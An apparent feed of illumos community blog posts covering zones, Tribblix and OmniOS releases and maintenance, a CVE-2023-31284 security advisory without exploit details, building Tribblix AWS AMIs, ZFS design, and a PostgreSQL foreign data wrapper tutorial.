I ended up using zones in production quite accidentally. In the Solaris 10 Platinum Beta, we were testing the new features, just giving them a good beating, when one of our webservers (it was something like a Netra X1) died. Sure, we could have got it repaired, or reconfigured another server. But as an experiment, I simply fired up a zone on one of my beta systems, gave it the IP address of the failed server, installed apache, copied over the website, and we were back in service in about 5 minutes.

The Zones framework turns out to be incredibly flexible and powerful. I suspect most don't realize just what it's actually capable of, as Sun only gave you a canned product in two variations - whole-root and sparse-root zones. Later you saw glimpses of the power available with the first incarnation of LX zones (or SCLA - Solaris Containers for Linux Applications) and then the Solaris 8 and Solaris 9 containers, which allowed a different set of applications to run inside a zone.

Things actually became more limited in OpenSolaris and its derivatives such as Solaris 11; not only was LX removed, but so were sparse-root zones, and the diversity of potential zone types dwindled.

In illumos, some of the distributions have pushed Zones a bit further. Tribblix brought back sparse-root zones, and introduced the alien brand - essentially a way to run any illumos OS or application in a zone. OmniOS has brought back LX, and it's reasonably current (in terms of keeping up with changes in the Linux world). SmartOS ran KVM in Zones, allowing double-hulled virtualization. And we now have bhyve as a fully supported offering for any illumos distribution, usually embedded in a Zone.

Using a sparse-root zone is incredibly efficient. By sharing the main operating system files (mostly /lib and /usr, but it can be others) you can save huge amounts of disk space - you only have to have one copy, so that's a saving of anything from a couple of hundred megabytes to a couple of gigabytes of storage per zone. It gets better, because the read-only segments of any binaries and shared libraries are shared between zones, which dramatically reduces the additional memory footprint of each zone. Further on from that, because Solaris has this trick whereby any shared object used more than 8 times (or something like that) is kept resident in memory, all the common applications are always in memory and start incredibly quickly.
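For the curious, configuring such a zone on Solaris 10 was a short zonecfg session - a plain create gave you the sparse layout by inheriting /lib, /platform, /sbin, and /usr from the global zone via inherit-pkg-dir resources. A rough sketch (zone name and paths here are made up):

```
# zonecfg -z web1
zonecfg:web1> create
zonecfg:web1> set zonepath=/zones/web1
zonecfg:web1> add inherit-pkg-dir
zonecfg:web1:inherit-pkg-dir> set dir=/opt
zonecfg:web1:inherit-pkg-dir> end
zonecfg:web1> commit
zonecfg:web1> exit
```

The extra inherit-pkg-dir shown here shares /opt read-only into the zone as well; the four default inherited directories come along with create automatically.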

One of the things I did was use sparse-root zones and shared filesystems for a development -> test -> production setup. Basically, you create 3 zones, sparse-root ensures they're identical, and 3 filesystems - one each for development, test, and production. You share the development filesystem read-only into the test zone, so deployment from development to test is a straight copy. Likewise test to production.
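A sketch of the read-only share into the test zone (zone and filesystem names here are hypothetical), using a lofs filesystem resource in zonecfg:

```
# zonecfg -z test
zonecfg:test> add fs
zonecfg:test:fs> set dir=/devel
zonecfg:test:fs> set special=/export/devel
zonecfg:test:fs> set type=lofs
zonecfg:test:fs> add options ro
zonecfg:test:fs> end
zonecfg:test> commit
```

Inside the test zone, /devel is then the development filesystem mounted read-only, so promoting from development to test is just a copy out of /devel.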

One of the weaknesses of the way that zones were managed (distinct from the underlying technology framework) is that it was based around packaging. In Solaris 10, packaging and packages knew about zones, and the details of what files and packages ended up in a zone were embedded in the package metadata. Not only is this complex, it's also very rigid - you can't evolve the system without changing the packaging system and modifying all the packages. Sadly, IPS carried forward the same mistake. (In Tribblix, packaging knows nothing about zones whatsoever, but my zones understand packaging and can do the right thing with it - not only with much more flexibility but many times quicker.)

Later on in the Solaris 10 timeframe we got ZFS, which allowed you to do interesting things around sharing data and quickly creating copies of data for zones, allowing you to extend the virtual capabilities of zones from cpu and memory to storage. And the key missing piece, virtualized networking, never made it to Solaris 10 at all, but had to wait for crossbow to arrive in OpenSolaris.

Maintaining old software with no sign of retirement The Trouble with Tribbles...

There's a lot of really old software out there. Some of it has simply been abandoned; others have been replaced by new versions. But old software never really goes away, and we end up maintaining it.

This is especially tricky when old software depends on other old software, and we have to support the entire dependency tree.

There's always python 2 and python 3. Some old software may never be fixed; some current software has consciously decided to stick with python 2. Distributions will be shipping python 2 for a long time yet.

Then there's PCRE and PCRE2. Some things have been updated; others haven't. Generally for this I'll keep updating, and eventually upstream might get around to migrating. But again I'll have to ship both for a while.

And then there's gtk2 and gtk3. (I find it ironic that the gimp itself is still using gtk2.) There's no end in sight of the need to ship both.

Some libraries have been deprecated entirely. The old libXp (the X printing library) is long gone. There were a couple of things built against it in Tribblix. I've just rebuilt chimera (a really old Xaw web browser, if your memory doesn't go that far back), which was one consumer and now isn't; the other one was Motif (there's a convenient build flag --disable-printing to disable libXp support, which entertainingly breaks the build someplace else, which I ended up having to fix).

Another example: libpng has gone through several revisions, each slightly incompatible, and you have to be sure to run with the same version you built against. At least you can ship all the different versions, as they have the version in their names. Mind you, linking against two different versions of libpng at the same time (for example, if a dependency pulls in a different version of libpng) is a bad thing, so I did have to rebuild a number of applications to avoid that. I ship the old libpng versions in a separate compat package; I think chimera was the only consumer, but I updated that to use a more current libpng.

A slightly different problem is the use of newer toolchains. Compilers are getting stricter over time, so old unmaintained software needs patches to even compile.

Don't even get me started on openssl.

Upgrading MATE on Tribblix The Trouble with Tribbles...

I spent a little time yesterday updating MATE on Tribblix, to version 1.26.

This was supposed to be part of the "next" release, but we had to make an out of sequence release for an illumos security issue, so everything gets pushed back a bit.

Updating MATE is actually fairly easy, though. The components in MATE are largely decoupled, so can be updated independently of each other. (And there isn't really a MATE framework everything has to subscribe to, so the applications can be used outside MATE without any issues.)

There's a bit of tidying up and polish that helps. For example, I delete static archives and the harmful libtool archive files. Not only does this save space, it helps maintainability down the line.

Builds have a habit of picking up dependencies from the build system. Sometimes you can control this with judicious --enable-foo or --disable-foo flags, sometimes you just have to make sure that the package you don't want pulled in isn't installed. The reverse is true too - if you want a feature to be enabled, you have to make sure the dependencies are installed first, and the feature will usually get enabled automatically.

That's not always true. For example, you have to explicitly tell it you have OSS for audio, it doesn't work this out on its own.

I took the opportunity to make everything 64-bit. Ultimately I want to get to 64-bit only. This involves a bit of working backwards - you have to make all consumers of a library 64-bit only first.

A couple of components are held downrev. The calculator now wants to pull in mpc and mpfr, which I don't package. (They're used by gcc, but I drop a copy of mpc and mpfr into the build for gcc to find rather than packaging them separately the way that most of the other illumos distributions do.) And pluma wants gtksourceview-4 which I don't have yet. This is related to the lack of tight coupling I mentioned earlier - there really isn't any problem having the different pieces that make up MATE at different revisions.

You stumble across bugs along the way. For example, mate-control-center actually needs GLib 2.66 or later, which I don't have yet (there's another whole set of issues behind that), but it doesn't actually check for the right version. Fortunately the requirement is fairly localized and easy to patch out.

That done, on to another set of updates...

Security Alert - CVE-2023-31284 Buffer Overflow OmniOS Community Edition

The illumos security team have today published a security advisory concerning CVE-2023-31284, a kernel stack overflow that can be performed by an unprivileged user, either in the global zone or in any non-global zone. A copy of their advisory is below.

ACTION: If you are using any of the supported OmniOS versions, or the recently retired r42, run pkg update to upgrade to a version that includes the fix. Note that a reboot is required. If you have already upgraded to r46, then you are all set as it already includes the fix.

The following OmniOS versions include the fix:

  • r151046
  • r151044y
  • r151042az
  • r151038cz

If you are running an earlier version, upgrade to a supported version (in stages if necessary) following the upgrade guide.

illumos Security Team advisory

We are reaching out today to inform you about CVE-2023-31284. We have pushed a commit to address this, which you can find at https://github.com/illumos/illumos-gate/commit/676abcb77c26296424298b37b9. While we don’t currently know of anyone exploiting this in the wild, this is a kernel stack overflow that can be performed by an unprivileged user, either in the global zone, or any non-global zone.

The following details provide information about this particular issue:

IMPACT: An unprivileged user in any zone can cause a kernel stack buffer overflow. While stack canaries can capture this and lead to a denial of service, it is possible for a skilled attacker to leverage this for local privilege escalation or execution of arbitrary code (e.g. if combined with another bug such as an information leak).

ACTION: Please be on the lookout for patches from your distribution and be ready to update.

MITIGATIONS: Running a kernel built with -fstack-protector (the illumos default) can help mitigate this and turn these issues into a denial of service, but that is not a guarantee. We believe that unprivileged processes which have called chroot(2) with a new root that does not contain the sdev (/dev) filesystem most likely cannot trigger the bug, but an exhaustive analysis is still required.

Please reach out to us if you have any questions, whether on the mailing list, IRC, or otherwise, and we’ll try to help as we can.

We’d like to thank Alex Wilson and the students at the University of Queensland for reporting this issue to us, and to Dan McDonald for his work in fixing it.

The illumos Security Team

Any problems or questions, please get in touch.

OmniOS Community Edition r151046 OmniOS Community Edition

OmniOSce v11 r151046 is out!

On the 1st of May 2023, the OmniOSce Association released a new stable version of OmniOS - The Open Source Enterprise Server OS. The release comes with many tool updates, brand-new features and additional hardware support. For details see the release notes.

Note that r151042 is now end-of-life. You should upgrade to r151046 to stay on a supported track. r46 is an LTS release with support until May 2026.

For anyone who tracks LTS releases, the previous LTS - r151038 - now enters its last year. You should plan to upgrade to r151046 during the next twelve months for continued support.

OmniOS is fully Open Source and free. Nevertheless, it takes a lot of time and money to keep maintaining a full-blown operating system distribution. Our statistics show that there are almost 2’000 active installations of OmniOS while fewer than 20 people send regular contributions. If your organization uses OmniOS based servers, please consider becoming a regular patron or taking out a support contract.

Any problems or questions, please get in touch.

The Final Lesson Tracing Kernel Functions: How the illumos AMD64 FBT Provider Intercepts Function Calls

The final lesson my father taught me.

SPARC Tribblix m26 - what's in a number? The Trouble with Tribbles...

I've just released Tribblix m26 for SPARC.

The release history on SPARC looks a little odd - m20, m20.6, m22, m25.1, and now m26. Do these release versions mean anything?

Up to and including m25.1, the illumos commit that the SPARC version was built from matched the corresponding x86 release. This is one reason there might be a gap in the release train - that commit might not build or work on SPARC.

As of m26, the version numbers start to diverge between SPARC and x86. In terms of illumos-gate, this release is closer to m25.2, but the added packages are generally fairly current, closer to m29. So it's a bit of a hybrid.

But the real reason this is a full release rather than an m25 update is to establish a new baseline, which allows me to reset compatibility guarantees and roll over versions of key components - in this case, it allows me to upgrade perl.

In the future, the x86 and SPARC releases are likely to diverge further. Clearly SPARC can't track the x86 releases perfectly, as SPARC support is being removed from the mainline source following IPD 19, and many of the recent changes in illumos simply aren't relevant to SPARC anyway. So future SPARC releases are likely to simply increment independently.

How I build the Tribblix AMIs The Trouble with Tribbles...

I run Tribblix on AWS, and make some AMIs available. They're only available in London (eu-west-2) by default, because that's the only place where I use them, and it costs money to have them available in other regions. If you want to run them elsewhere, you can copy the AMI.

It's not actually that difficult to create the AMIs, once you've got the hang of it. Certainly some of the instructions you might find can seem a little daunting. So here's how I do it. Some of the details here are very specific to my own workflow, but the overall principles are fairly generic. The same method would work for any of the illumos distributions, and you could customize the install however you wish.

The procedure below assumes you're running Tribblix m29 and have bhyve installed.

The general process is to boot and install an instance into bhyve, then boot that and clean it up, save that disk as an image, upload to S3, and register an AMI from that image.

You need to use the minimal ISO (I actually use a custom, even more minimal ISO, but that's just a convenience for myself). Just launch that as root:

zap create-zone -t bhyve -z bhyve1 \
-x  \
-I /var/tmp/tribblix-0m29-minimal.iso \
-V 8G

Note that this creates an 8G zvol, which is the starting size of the AMI.

Then run socat as root to give you a VNC socket to talk to

socat TCP-LISTEN:5905,reuseaddr,fork UNIX-CONNECT:/export/zones/bhyve1/root/tmp/vm.vnc

and as yourself, run the vnc viewer

vncviewer :5

Once it's finished booting, log in as root and install with the ec2-baseline overlay which is what makes sure it's got the pieces necessary to work on EC2.

./live_install.sh -G c1t0d0 ec2-baseline

Back as root on the host, ^C to get out of socat, remove the ISO image and reboot, so it will boot from the newly installed image.

zap remove-cd -z bhyve1 -r

Restart socat and vncviewer, and log in to the guest again.

What I then do is remove any configuration or other data from the guest that we don't want in the final system. (This is similar to the old sys-unconfig that those of us who used Solaris will be familiar with.)

zap unconfigure -a

I usually also ensure that a functional resolv.conf exists, just in case dhcp doesn't create it correctly.

echo "nameserver" > /etc/resolv.conf

Back on the host, shut the instance down by shutting down the bhyve zone it's running in:

zoneadm -z bhyve1 halt

Now the zfs volume you created contains a suitable image. All you have to do is get it to AWS. First copy the image into a plain file:

dd if=/dev/zvol/rdsk/rpool/bhyve1_bhvol0 of=/var/tmp/tribblix-m29.img bs=1048576

At this point you don't need the zone any more so you can get rid of it:

zap destroy-zone -z bhyve1

The raw image isn't in a form you can use, and needs converting. There's a useful tool for this - the VMDK stream converter - just untar it and run it on the image:

python2 ./VMDK-stream-converter-0.2/VMDKstream.py /var/tmp/tribblix-m29.img /var/tmp/tribblix-m29.vmdk

Now copy that vmdk file (which is also a lot smaller than the raw img file) up to S3; in the following you need to adjust the bucket name from mybucket to one of your own:

aws s3 cp --cli-connect-timeout 0 --cli-read-timeout 0 \
/var/tmp/tribblix-m29.vmdk s3://mybucket/tribblix-m29.vmdk

Now you can import that image into a snapshot:

aws ec2 import-snapshot --description "Tribblix m29" \
--disk-container file://m29-import.json

where the file m29-import.json looks like this:

{
    "Description": "Tribblix m29 VMDK",
    "Format": "vmdk",
    "UserBucket": {
        "S3Bucket": "mybucket",
        "S3Key": "tribblix-m29.vmdk"
    }
}
The command will give you an import task id, which looks like import-snap-081c7e42756d7456b, and you can follow its progress with

aws ec2 describe-import-snapshot-tasks --import-task-ids import-snap-081c7e42756d7456b
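If you're scripting the whole build, this wait can be automated instead of re-running the command by hand. A hedged Python sketch against the boto3-style describe_import_snapshot_tasks() call (the function wait_for_import and the injectable ec2 argument are my own; in real use you'd pass boto3.client("ec2")):

```python
import time

def wait_for_import(ec2, task_id, poll_seconds=15):
    """Poll an import-snapshot task until it finishes and return the
    snapshot id.  `ec2` is anything exposing a boto3-style
    describe_import_snapshot_tasks() method."""
    while True:
        resp = ec2.describe_import_snapshot_tasks(ImportTaskIds=[task_id])
        detail = resp["ImportSnapshotTasks"][0]["SnapshotTaskDetail"]
        status = detail.get("Status")
        if status == "completed":
            return detail["SnapshotId"]
        if status in ("deleted", "deleting"):
            raise RuntimeError(detail.get("StatusMessage", "import failed"))
        time.sleep(poll_seconds)
```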

When that's finished it will give you the snapshot id itself, such as snap-0e0a87acc60de5394. From that you can register an AMI, with

aws ec2 register-image --cli-input-json file://m29-ami.json

where the m29-ami.json file looks like:

{
    "Architecture": "x86_64",
    "Description": "Tribblix, the retro illumos distribution, version m29",
    "EnaSupport": false,
    "Name": "Tribblix-m29",
    "RootDeviceName": "/dev/xvda",
    "BlockDeviceMappings": [
        {
            "DeviceName": "/dev/xvda",
            "Ebs": {
                "SnapshotId": "snap-0e0a87acc60de5394"
            }
        }
    ],
    "VirtualizationType": "hvm",
    "BootMode": "legacy-bios"
}
If you want to create a Nitro-enabled AMI, change "EnaSupport" from "false" to "true", and "BootMode" from "legacy-bios" to "uefi".
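Since the only differences between the two variants are those two fields, the register-image input is easy to generate from a script. A small Python sketch (the helper name register_image_json is my own):

```python
def register_image_json(name, description, snapshot_id, nitro=False):
    """Build the `aws ec2 register-image --cli-input-json` document;
    nitro=True flips EnaSupport and BootMode as described above."""
    return {
        "Architecture": "x86_64",
        "Description": description,
        "EnaSupport": nitro,
        "Name": name,
        "RootDeviceName": "/dev/xvda",
        "BlockDeviceMappings": [
            {"DeviceName": "/dev/xvda",
             "Ebs": {"SnapshotId": snapshot_id}},
        ],
        "VirtualizationType": "hvm",
        "BootMode": "uefi" if nitro else "legacy-bios",
    }
```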

What, no fsck? The Trouble with Tribbles...

There was a huge amount of resistance early on to the fact that zfs didn't have an fsck. Or, rather, a separate fsck.

I recall being in Sun presentations introducing zfs and question after question was about how to repair zfs when it got corrupted.

People were so used to shoddy file systems - implemented so badly that a separate utility was needed to repair errors caused by fundamental design and implementation flaws in the file system itself - that the idea that the file system driver itself ought to take responsibility for managing the state of the file system was totally alien.

If you think about ufs, for example, there were a number of known failure modes, and what you did was take the file system offline, run the checker against it, and it would detect the known errors and modify the bits on disk in a way that would hopefully correct the problem. (In reality, if you needed it, there was a decent chance it wouldn't work.) Doing it this way was simple laziness - it would be far better to just fix ufs so it wouldn't corrupt the data in the first place (ufs logging went a long way towards this, eventually). And you were only really protecting against known errors, where you understood exactly the sequence of events that would cause the file system to end up in a corrupted state, so that random corruption was either undetectable or unfixable, or both.

The way zfs thought about this was very different. To start with, eliminate all known behaviour that can cause corruption. The underlying copy on write design goes a long way, and updates are transactional so either complete or not. If you find a new failure mode, fix that in the file system proper. And then, correction is built in rather than separate, which means that it doesn't need manual intervention by an administrator, and all repairs can be done without taking the system offline.

Thankfully we've moved on, and I haven't heard this particular criticism of zfs for a while.

Creating a simple foreign data wrapper for PostgreSQL alp's notes

Today I'd like to describe how to create your own minimal usable foreign data wrapper (FDW) for PostgreSQL.

Common information about FDW interfaces

I assume you know C and have basic PostgreSQL DBA experience. A foreign data wrapper (FDW) is a means of accessing other data sources from the PostgreSQL DBMS. In this article I'll walk you through writing a minimal usable FDW (mufdw). Going through the mufdw code, I'll show you how you can use the PostgreSQL FDW API (you can find its description in the official documentation).

To access another data source you define an FDW by specifying its name, a validator function and a handler function, like this:

CREATE FOREIGN DATA WRAPPER mufdw
  HANDLER mufdw_handler
  VALIDATOR mufdw_validator;

Both the handler and the validator are SQL functions. The validator is called when a user mapping, foreign server or foreign table is created or modified, to check that the options given are valid for that object. The handler just returns a struct containing the methods that define the FDW (FdwRoutine). Most FDWs create the foreign data wrapper behind the scenes when you create the extension, so for an administrator this step simply looks like

CREATE EXTENSION mufdw;

Next you should define a foreign server, which basically specifies the remote server host in one way or another. For example, you can define the host name, port and database name in the foreign server options. Our sample mufdw allows you to query another table in the same database, so the server definition doesn't need any options and you can create the server simply with

CREATE SERVER loopback FOREIGN DATA WRAPPER mufdw;

Now we have to define a user mapping - how a local user should access the remote data source. Usually a user mapping definition includes authentication information, such as the remote user name and password. As our minimal usable FDW just wraps local tables and scans them as the same user (via the SPI interface), our user mapping is purely formal:

CREATE USER MAPPING FOR PUBLIC SERVER loopback;

Let's create a plain table which will be used as a source for our foreign table.

CREATE TABLE players(id int primary key, nick text, score int);
INSERT INTO players SELECT i, 'nick_'||i, i*10 from generate_series(1,10) i;
A foreign table is an object which behaves mostly like a normal table, but provides access to remote data. In the foreign table definition we provide the options necessary to identify this data. In our case it's the local table and schema name.

CREATE FOREIGN TABLE f_players (id int, nick text, score int) server loopback options (table_name 'players', schema_name 'public');
Now we can query data from our foreign table.

SELECT * FROM f_players;
 id |  nick   | score 
----+---------+-------
  1 | nick_1  |    10
  2 | nick_2  |    20
  3 | nick_3  |    30
  4 | nick_4  |    40
  5 | nick_5  |    50
  6 | nick_6  |    60
  7 | nick_7  |    70
  8 | nick_8  |    80
  9 | nick_9  |    90
 10 | nick_10 |   100
(10 rows)

What happens when you query a foreign table? The PostgreSQL planner first checks whether a table used in the query is a foreign table, and looks up its foreign server's FdwRoutine. A pointer to the FdwRoutine is recorded in the RelOptInfo structure, which the planner uses to represent a relation. This work is done in the get_relation_info() function.

The planner first calls our FDW methods when it looks for the relation size in set_rel_size(), which is called for each base relation at the beginning of planning (in make_one_rel()). set_foreign_size() calls GetForeignRelSize() to find out the relation size after applying restriction clauses. When the planner generates the possible paths to access a base relation in set_rel_pathlist(), it calls the GetForeignPaths() function from RelOptInfo->fdwroutine to generate a foreign path. Access paths are used by the planner to enumerate the possible strategies for accessing a relation. Usually for foreign tables there will be no other paths besides the foreign path. For a join relation there can be several paths - a foreign join path and several local join paths (for example, using the nestloop or hash join methods). If the foreign path is the best access path for a particular relation, the GetForeignPlan() function from its fdwroutine is called to generate a ForeignScan plan in create_foreignscan_plan().

The executor then executes the ForeignScan plan. When it initializes the foreign scan state, BeginForeignScan() is called. Later, tuples are fetched as needed by the executor in IterateForeignScan(). If it's necessary to restart the foreign scan from the beginning, ReScanForeignScan() is called. When the relation scan is finished, EndForeignScan() is called.

Mufdw implementation

Let's look at how the minimal set of functions needed by read-only FDW is implemented in mufdw.

The basic logic behind mufdw is simple. For each foreign table we provide the table name and table schema as foreign table options. When a user queries the remote table, we open an SPI cursor and fetch data from the local table identified by that schema and name. The query text is saved in the foreign scan's private field during planning. In BeginForeignScan() we create a cursor for later use. IterateForeignScan() fetches one tuple from it and saves it in the executor state node's scan slot. ("Node" here refers to the basic "class"-like hierarchical structures used in the PostgreSQL source code.)
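That lifecycle can be sketched as a toy model (purely illustrative Python; the real implementation is C against the executor API, and these method names merely mirror the callbacks):

```python
class ScanState:
    """Toy model of mufdw's scan lifecycle: Begin opens the cursor,
    Iterate returns one row at a time (None at end of scan),
    ReScan restarts from the beginning."""
    def __init__(self, rows):
        self.rows = rows          # stands in for the SPI cursor's result set
        self.pos = 0

    def begin_foreign_scan(self):
        self.pos = 0              # "open the cursor"

    def iterate_foreign_scan(self):
        if self.pos >= len(self.rows):
            return None           # empty slot: end of scan
        row = self.rows[self.pos]
        self.pos += 1
        return row

    def rescan_foreign_scan(self):
        self.pos = 0              # close the cursor and open a new one

# the executor's calling pattern
scan = ScanState([(1, "nick_1", 10), (2, "nick_2", 20)])
scan.begin_foreign_scan()
out = []
while (t := scan.iterate_foreign_scan()) is not None:
    out.append(t)
```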

GetForeignRelSize() function

void GetForeignRelSize(PlannerInfo *root, RelOptInfo *baserel, Oid foreigntableid)

This method obtains relation size estimates for a foreign table. Here root is the planner's information about the query, baserel is the information about the table, and foreigntableid is the Oid of the foreign table. In this function we have to fill in baserel->tuples and baserel->rows. baserel->fdw_private can be initialized and used for private FDW purposes.

In mufdw it is implemented as mufdwGetForeignRelSize(), which basically allocates memory for the relation's fdw_private structure, searches the foreign table options for "schema_name" and "table_name" and saves them for further use. It also makes a minimal effort to estimate the relation size, but in fact it gives default estimates, as we don't gather any statistics for mufdw foreign tables.

GetForeignPaths() function

void GetForeignPaths(PlannerInfo *root, RelOptInfo *baserel, Oid foreigntableid)

This function should create a foreign path and add it to baserel->pathlist. It's recommended to use create_foreignscan_path() to build the ForeignPath. The arguments are the same as for GetForeignRelSize().

In mufdw it is implemented as mufdwGetForeignPaths(). It creates a basic foreign scan path and adds it to the relation's path list. The cost is estimated as for a sequential scan; these estimates are not accurate in any way.

GetForeignPlan() function

ForeignScan *GetForeignPlan(PlannerInfo *root, RelOptInfo *baserel, Oid foreigntableid, ForeignPath *best_path, List *tlist, List *scan_clauses, Plan *outer_plan)

This function is called at the end of query planning and should create a ForeignScan plan node. It is passed the foreign path generated by GetForeignPaths(), GetForeignJoinPaths() or GetForeignUpperPaths(). We also get the target list which should be emitted by the plan node, the restriction clauses to be enforced, and the outer subplan of the ForeignScan.

In mufdw it is implemented as mufdwGetForeignPlan(). We put all scan clauses in the plan node's qual list for recheck, as mufdw doesn't perform "remote" filtering. The function gets the scan clauses as a list of RestrictInfo nodes, but should use an expression list for the plan quals; extract_actual_clauses() is used to perform this transformation. We also construct a simple "SELECT *" query to extract data from the plain table. The fdw_private field of the ForeignScan should be a list of nodes, so that copyObject() can copy them, so we wrap our C string representing the query into a String node and create fdw_private as a single-member list.

BeginForeignScan() function

void BeginForeignScan(ForeignScanState *node, int eflags)

This function is called to begin foreign scan execution. It can, for example, establish a connection to a DBMS. Note that the function will also be called when running EXPLAIN for a query (in that case (eflags & EXEC_FLAG_EXPLAIN_ONLY) is true). When called from EXPLAIN, the function should avoid doing anything externally visible.

In mufdw it is implemented as mufdwBeginForeignScan(). Here we create a cursor for the query constructed during plan creation and initialize the internal scan state with its name. Our local open_new_cursor() function opens a cursor for the query using SPI and returns the name of the corresponding portal. The issue here is that the SPI memory context is transient - we can't use memory allocated in it in other parts of the program - so we have to copy the name into our longer-lived context.

IterateForeignScan function

TupleTableSlot *IterateForeignScan(ForeignScanState *node)

This function is used to fetch one tuple and return it in ForeignScanState's tuple slot.

In mufdw it is implemented as mufdwIterateForeignScan(). First we clear the tuple slot, find our SPI cursor and fetch one tuple from it. If there's no data, that is all we need to do - the empty slot signals the end of the scan. If there is data, we deform the SPI tuple into the slot's arrays of values and nulls and call ExecStoreVirtualTuple() to store it. The only wrinkle is that the tuple has to be materialized, as the SPI tuple will be released when the SPI context is destroyed.

ReScanForeignScan function

void ReScanForeignScan(ForeignScanState *node)

This function is used to restart the scan from the beginning.

In mufdw it is implemented as mufdwReScanForeignScan(). It just closes the old cursor and opens a new one for our query, which is stored in the foreign scan's internal state.

EndForeignScan function

void EndForeignScan(ForeignScanState *node)

This function should just end scan and release resources.

In mufdw it is an empty function. We don't explicitly release resources as they will be released when transaction ends.

fdw_handler function

fdw_handler is just a SQL function which returns a pointer to the FdwRoutine structure containing references to the FDW functions we've just described.

In mufdw it's implemented as mufdw_handler(). Only the functions necessary for querying foreign tables are implemented.

fdw_validator function

fdw_validator checks the options used in CREATE or ALTER statements for foreign data wrappers, foreign servers, user mappings and foreign tables. It gets the list of options as a text array in the first argument, and an OID representing the type of object the options are associated with in the second. The OID can be ForeignDataWrapperRelationId, ForeignServerRelationId, UserMappingRelationId, or ForeignTableRelationId.

In mufdw it's implemented as mufdw_validator. It allows only "table_name" and "schema_name" options for foreign tables and doesn't check options for other objects.

SQL code

We need a bit of SQL code to glue this all together. We should create SQL-level functions for the validator and handler and create the foreign data wrapper. For mufdw this is done in its extension script.


We looked at how you can create a simple read-only foreign data wrapper in C, analyzing the mufdw sample foreign data wrapper. I hope this was useful, or at least interesting.

The jeffpc Amateur Radio Fox Josef "Jeff" Sipek

There are already a number of different fox hunting designs out there, both commercial and hobbyist built. So there is no practical reason to make another design, but educational and entertainment reasons are valid as well.

So I made one.

I put together a project page which talks about the project a little bit but mostly serves to point at the source, binary files, schematic, and a manual. Since it doesn’t make sense for me to repeat myself, just go over to the project page and read more about it there ;)

Finally, this is what the finished circuit looks like:

As always, comments, suggestions, and other feedback are welcome.